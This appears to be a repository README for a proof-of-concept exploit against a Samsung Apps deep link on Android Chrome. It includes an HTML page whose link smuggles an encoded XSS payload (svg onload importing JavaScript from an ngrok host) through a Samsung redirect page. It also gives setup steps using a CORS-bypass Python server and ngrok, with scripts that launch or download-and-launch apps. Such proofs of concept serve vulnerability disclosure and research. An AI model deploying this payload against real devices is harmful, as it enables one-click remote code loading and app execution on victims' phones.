Enable build support by adding .buildspec.yml
| 4704AD7F-A8FF-4CC8-B3AA-96E51E4F7592.gif | Loading last commit info... | |
| README.md | ||
| down_and_open.js | ||
| download.js | ||
| https.py | ||
| index.html | ||
| open.js |
README.md
Proof of concept
We will design a simple website like this:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<a href="samsungapps://MCSLaunch?action=each_event&url=https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs_ru=a%26testMode=1%26%22id=%22%3Ca%2520id%253d%22%3e%3Csvg/onload%253dimport(%27https://xxxxxx.ngrok.io/open.js%27)%3e%22%3e">1 click</a>
</body>
</html>
-
The file open.js will open the calc app.
-
The file download.js will open the calc app.
-
The file down_and_open.js will download then open calc app.
To be able to successfully exploit the victim’s server, it is necessary to have https and CORS bypass of chrome. We will use python and ngrok for setup.
The steps are as follows:
- Run the file https.py to bypass CORS and open a server on port 8000
- Run ngrok http 8000
- On a samsung device, use chrome to access the victim server and click on the link.
Demo
